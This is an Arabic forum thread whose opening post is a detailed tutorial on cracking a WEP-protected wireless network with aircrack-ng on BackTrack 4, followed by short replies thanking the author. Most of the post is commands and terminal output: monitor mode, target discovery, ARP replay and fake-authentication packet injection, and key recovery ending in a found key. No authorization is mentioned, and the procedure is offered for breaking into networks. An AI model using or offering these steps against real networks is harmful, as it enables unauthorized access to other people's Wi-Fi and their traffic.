![]() |
كسر تشفير وايرلس عليها حماية نوع web بالتفصيل الممل [align=center]السلام عليكم ورحمة الله وبركاته اود ان أضع بين أيديكم شرح عن كيفية كسر حماية شبكة وايرلس نوع الحماية تبعها web وهذه الحماية سهلة جدا للكسر وليست صعبه كالـ wpa wpa/wpa2 لأنها تعتمد على تجميع باكيتس وكسرهم .. ومعرفه كلمة السر .. أولا يجب أن نفهم عدة أشياء أن هذا التشفير فيه نوعين .. اما 64 بت .. او 128 بت .. بحيث ان ال128 بت يجب ان تكون كلمة السر مكونة من 23 حرف .. وما بعتقد أن يستخدمها أحد .. بل الأكثر يستخدم 64 بت .. اللتي تكون مكونة من 5 أو 10 أحرف وهذا سهل للجميع حفظه فهم يستخدمونها .. إن كسر 128 نفس كسر ال 64 لكن يجب الحصول على باكيتس أكثر .. نبدأ بالشرح ... الأدوات المستخدمة هي حزمة aircrack ويمكن تحميلها من موقعها الرسمي وتثبيتها والمهم اننا نعمل على بيئة لينوكس توزيعه باك تراك4 لأن كل شي نحتاجه موجود فيها .. نبدأ أولا نعرف اسم كرت الوايرلس اللي عندنا بالجهاز .. سواء لابتوب او جهاز ثابت فنكتب بالشيل iwconfig فنجد مكتوب بجنبه IEEE 802.11bg انا عندي اسمه wlan0 اوك .. الأن نشغل المونيتور على اسم الكرت .. يعني المراقبة airmon-ng start wlan0 كود: root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) اشتغل على الـ mon0 قد يسأل البعض ليش على mon0 مش على الأساسي wlan0 اقول حسب نوع الكرت .. وهل هو حجديث او لا .. لان بإمكانك ان تشغل مراقبة على أكثر من قناة .. وهو يعطيك اسم جديد الأن نشغل الـ airodump-ng ونكتب بعدها اسم الكرت اللي تفعل عليه المراقبة وهو الأن mon0 لكي نرى الراوترات المحيطة بنا فنكتب بالشيل كود: airodump-ng mon0 فنرى كود: CH 11 ][ Elapsed: 4 s ][ 2010-03-12 13:11 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:9F:D3:1F:EB -54 16 0 0 7 54 WEP WEP mine BSSID STATION PWR Rate Lost Packets Probes 00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -48 0 - 1 17 9 ما يهمنا .. هو اسم الراوتر والقناة اللي تشتغل عليها والماك أدريس للراوتر .. والماك أدريس للمتصل بها الأن اسم الراوتر هو mine القناة اللي تستخدمها هي 7 الماك أدريس للراوتر 00:1F:9F:D3:1F:EB الماك أدريس للجهاز المتصل 00:13:CE:4F:B5:51 اوك .. الأن نوقف المراقبة عن الكرت mon0 and wlan0 airmon-ng stop mon0 airmon-ng stop wlan0 كود: root@bt:~# airmon-ng stop mon0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] mon0 Atheros ath5k - [phy0] (removed) root@bt:~# airmon-ng stop wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode disabled) وذلك لكي نعيد تشغيل المراقبة على نفس القناة .. (تنجح بدون ذلك .. لكن الأفضل عملها) نشغل المراقبة على القناة 7 اللي عليها الراوتر airmon-ng start wlan0 7 كود: root@bt:~# airmon-ng start wlan0 7 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) أخبرنا أنه تم تفعيل المراقبة على اسم mon0 اوك .. الأن كل شي تمام نبدأ بعمل airodump-ng نكتب بالشيل كود: airodump-ng -c 7 --bssid 00:1F:9F:D3:1F:EB -w wwww mon0 فيطلعلنا كود: CH 7 ][ Elapsed: 0 s ][ 2010-03-12 13:22 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:9F:D3:1F:EB -46 100 32 7 2 7 54 WEP WEP mine BSSID STATION PWR Rate Lost Packets Probes 00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -47 0 - 5 488 29 الأن نشغل الaireplay-ng حتى نجمع الباكيتس فنكتب كود: aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0 -3 ... arprequest تجميع طلبات الباكيتس -b بعدها الماك أدريس للراوتر -h بعدها الماك أدريس للمتصل mon0 اسم الكرت اللي نراقب عليه يطلعلنا هكذا كود: root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0 The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 00:13:CE:4F:B5:51 13:26:55 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7 Saving ARP requests in replay_arp-0312-132655.cap You should also start airodump-ng to capture replies. ad 325 packets (got 0 ARP requests and 93 ACKs), sent 0 packets...(0 pps) الأن المهم هو الأر بي ARP وتجميعهم .. ولزيادة ذلك نشغل ال aireplay-ng لإرسال باكتس زائفة للراوتر وتجميع packets and ARP فنكتب بالشيل كود: aireplay-ng -1 7000 -e mine -a 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0 -e اسم الراوتر -a الماك أدريس للراوتر -h الماك أدريس للجهاز المتصل فيبدأ بإرسال باكيتس زائفة ثم ننتقل للشاشة الموجود فيها تجميع الباكيتس فنجد أنهم زادو كود: root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0 For information, no action required: Using gettimeofday() instead of /dev/rtc The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 00:13:CE:4F:B5:51 13:31:20 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7 Saving ARP requests in replay_arp-0312-133120.cap You should also start airodump-ng to capture replies. ad 537517 packets (got 19757 ARP requests and 211372 ACKs), sent 224454 packets...(499 pps) ونلاحظ زيادة بالباكيتس إلى 537517 .. وزيادة بالـ ARP إلى 19757 والأن أصبح لدينا عدد جيد من الباكيتس والأر بي فنشغل الـ aircrack-ng ونكتب بشاشة مستقلة كود: aircrack-ng -z -b 00:1F:9F:D3:1F:EB ww*.cap -z أي أنها ويب -b وبعدها الماك أدريس للراوتر ww*.cap ملف الكاب فيبدأ بالكسر كود: Aircrack-ng 1.0 r1668 [00:00:53] Tested 17287 keys (got 16942 IVs) KB depth byte(vote) 0 0/ 3 12(27136) 6F(25088) A2(24064) 8D(23808) 46(23552) C1(23296) 0E(23040) 70(23040) 87(23040) 1 4/ 6 70(23296) 43(23040) 44(23040) 94(23040) C8(23040) 2B(22784) D1(22784) F5(22784) 34(22528) 2 0/ 9 23(25856) 65(25088) 93(25088) 9B(24576) A3(23808) 08(23552) 40(23552) 4F(23296) 64(23296) 3 0/ 16 12(24832) AB(23040) 30(23040) 8B(22528) 81(22528) 35(22272) 75(22272) AA(22016) C7(22016) 4 5/ 8 31(24064) 87(23296) 1A(23296) B0(22784) A0(22528) D9(22528) 41(22272) F4(22272) 6C(21760) KEY FOUND! [ 12:31:23:12:31 ] Decrypted correctly: 100% نلاحظ أنه كسره وعرفنا كلمة السر KEY FOUND! [ 12:31:23:12:31 ] وهي بين الـ : يعني هي 1231231231 ملاحظة .. أنه قد تحتاج إلى عدد أكبر من الباكيتس .. وقد تنجح بأقل وقد تواجه مشكلة انه تجد ان القناة للراوتر هي مثلا 144 او 158 .. ولا يمكن مراقبتها .. المشكلة انحلت بعون الله .. وهو أنه يجب أن تغير مكانك فقط حتى تثبت القناة إلى هنا نكون انتهينا >> ان شاء الله أكون وفقت في الشرح .. وما توفيقي إلا من الله .. وان كان احد عنده ملاحظة .. يقول وشكرا[/align] |
موفقين جميعا |
موفقين جميعا |
الف شكر |
الف شكر |
[align=center]الف شكر لك بارك الله فيك[/align] |
يسلمووو على هذا الابداع |
الله يعافيك ^_^ |
[align=center]بارك الله و الموضوع الرئع و شرح جيد[/align] |
الساعة الآن 08:29 AM |
[ vBspiders.Com Network ]